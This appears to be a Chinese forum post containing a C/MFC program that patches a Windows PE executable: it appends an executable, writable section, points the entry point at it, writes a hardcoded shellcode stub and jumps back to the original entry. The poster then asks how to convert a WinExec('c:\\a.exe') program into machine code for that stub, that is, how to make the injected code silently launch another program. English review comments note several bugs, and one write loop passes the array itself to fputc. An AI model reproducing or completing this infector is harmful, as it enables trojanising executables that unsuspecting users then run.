//???注明 By 小浩 QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>
// 36-byte opaque buffer that main() writes into the new section; main()
// overwrites bytes 32..35 with the value produced by StrOfDWord() before
// the buffer is written out. The meaning of the bytes is not documented here.
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
/*
 * Serialise the 32-bit value dwAddress as four little-endian bytes
 * (bytes[0] is the least significant) and hand them back through
 * CString's pointer constructor. The local buffer is exactly four bytes
 * and carries no terminator beyond them.
 */
CString StrOfDWord(DWORD dwAddress)
{
    unsigned char bytes[4] = {0};
    for (int k = 0; k < 4; k++) {
        bytes[k] = (char)(dwAddress >> (8 * k)) & 0xFF;
    }
    return bytes;
}
/*
 * Round size up to a multiple of ALIGN_BASE.
 *
 * size        value to round; returned unchanged when already a multiple
 * ALIGN_BASE  alignment granularity, must be non-zero (asserted)
 * returns     for non-negative inputs, the smallest multiple of ALIGN_BASE
 *             that is >= size; uses C's truncating integer division, so
 *             negative inputs follow that truncation rather than flooring
 */
int Align(int size, int ALIGN_BASE)
{
    assert( 0 != ALIGN_BASE );
    int remainder = size % ALIGN_BASE;
    if (remainder == 0) {
        return size;
    }
    return (size / ALIGN_BASE + 1) * ALIGN_BASE;
}
// Entry point. Reads a file path from stdin, keeps a ".bak" copy of the file,
// then appends one section header and one block of section data to the PE
// image and points AddressOfEntryPoint at the new section. Every failure
// path prints a message and returns. (void main is non-standard; int main(void)
// is the portable form.)
void main()
{
char szFilePath[MAX_PATH]={0};
printf("Please Input FilePath:");
// NOTE(review): "%s" has no width limit, so input longer than MAX_PATH-1 bytes
// overruns szFilePath; "&szFilePath" is also a char(*)[MAX_PATH], not the
// char* that %s expects (the address value happens to coincide).
scanf("%s",&szFilePath);
char szFilaBak[MAX_PATH]={0};
// Path plus ".bak" can exceed MAX_PATH; lstrcat does not bound the write.
lstrcpy(szFilaBak,szFilePath);
lstrcat(szFilaBak,".bak");
// bFailIfExists == FALSE: an existing .bak copy is silently overwritten.
int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
if(!nRet)
{
printf("CopyFile Error!\r\n");
return;
}
FILE *pFile;
// Opened read/write in place. The early returns below do not fclose(pFile).
pFile=fopen(szFilePath,"rb+");
if(pFile==NULL)
{
printf("fopen Error!\r\n");
return;
}
fseek(pFile,0,SEEK_SET);
IMAGE_DOS_HEADER iMageDosHeader;
// fread return values are not checked here or below: a truncated file leaves
// the header structs partly uninitialized before their fields are compared.
fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
// e_lfanew is taken from the file unvalidated; nothing checks that it lies
// within the file.
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
IMAGE_NT_HEADERS iMageNtHeaders;
// NOTE(review): OptionalHeader.Magic is never checked, so a PE32+ image would
// be read through a 32-bit IMAGE_NT_HEADERS layout — confirm PE32-only input.
fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
printf("%d Segment\r\n",nNumOfSections);
int nFileAlignMent,nSectionAlignMent;
nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
printf("File Align Ment:%x\r\n",nFileAlignMent);
printf("Section Align Ment:%x\r\n",nSectionAlignMent);
// Original entry point, kept for the displacement computed further down.
DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
printf("File OEP:%08x\r\n",dwOldOEP);
IMAGE_SECTION_HEADER iMageSectionHeader;
// After this loop iMageSectionHeader holds the LAST section header, which the
// new section's addresses are derived from; with zero sections it stays
// uninitialized. Name is an 8-byte field that need not be NUL-terminated, so
// printing it with "%s" can read past the field.
for(int i=0;i<nNumOfSections;i++)
{
fread(&iMageSectionHeader,sizeof(IMAGE_SECTION_HEADER),1,pFile);
printf("Segment name:%s\r\n",iMageSectionHeader.Name);
}
IMAGE_SECTION_HEADER iMageNewSection;
memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));
// The memset above already zeroed Name, so copying without the terminator
// still leaves it terminated.
strncpy((char*)iMageNewSection.Name,".x4h",strlen(".x4h"));
iMageNewSection.VirtualAddress=Align(iMageSectionHeader.VirtualAddress
+iMageSectionHeader.Misc.VirtualSize,nSectionAlignMent);
int extraLengthAfterAlign=Align(30,nFileAlignMent);
iMageNewSection.Misc.VirtualSize=Align(extraLengthAfterAlign,nSectionAlignMent);
iMageNewSection.PointerToRawData=Align(iMageSectionHeader.PointerToRawData
+iMageSectionHeader.SizeOfRawData,nFileAlignMent);
iMageNewSection.SizeOfRawData=Align(0x1000,nFileAlignMent);
// Magic constant for the section flags; spelling it with the IMAGE_SCN_*
// names would make the intent readable.
iMageNewSection.Characteristics=0xE0000020;
iMageNtHeaders.FileHeader.NumberOfSections++;
iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
+0x1000,nFileAlignMent);
iMageNtHeaders.OptionalHeader.SizeOfImage=iMageNtHeaders.OptionalHeader.SizeOfImage
+Align(0x1000,nSectionAlignMent);
// Bound-import directory is cleared.
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;
// This seek is a no-op: the next fseek is absolute (SEEK_SET).
fseek(pFile,0,SEEK_END);
// Writes the new header directly after the existing section table; nothing
// checks that the table has room for one more entry. fwrite results are not
// checked here or below.
fseek(pFile,iMageDosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)
+nNumOfSections*sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile);
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
fseek(pFile,0,SEEK_END);
CString szOepA;
DWORD dwAddress;
// Unsigned wraparound of 0-(...) is relied on here to form the displacement.
dwAddress = 0-(iMageNewSection.VirtualAddress-dwOldOEP+sizeof(szHexCode));
szOepA=StrOfDWord(dwAddress);
// NOTE: `i` is reused from the earlier for(int i...) declaration; this only
// compiles under the pre-standard MSVC for-loop scope rule.
for(i=0;i<4;i++)
{
szHexCode[32+i]=szOepA.GetAt(i);
}
// Align(...) is re-evaluated on every iteration; it is loop-invariant.
for (i=0; i<Align(0x1000,nFileAlignMent);i++)
{
fputc(0,pFile);
}
fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET);
// Signed/unsigned comparison: i is int, sizeof(szHexCode) is size_t.
for (i=0; i<sizeof(szHexCode);i++)
{
fputc(szHexCode,pFile);
}
// fclose return value (the flush of the rewritten headers) is not checked.
fclose(pFile);
}
szHexCode 的內容是如何得到的？
假如我想把 szHexCode 的內容改成可以打開 c:\a.exe 的，那麼 C 下的代碼是：
#include <windows.h>
// Starts the hard-coded program c:\a.exe through the legacy WinExec API
// (second argument is the uCmdShow value 0). void main is non-standard;
// int main(void) is the portable form.
void main()
{
WinExec("c:\\a.exe",0);
}
如何把這個程式變成機器碼放進szHexCode 內呢?
ps
如何把這個程式變成機器碼放進szHexCode 內呢?
即提取這個程式那部份的機器碼 再放進szHexCode內
因為我試過把整個程式都讀成機器碼放進去是不能正常執行的!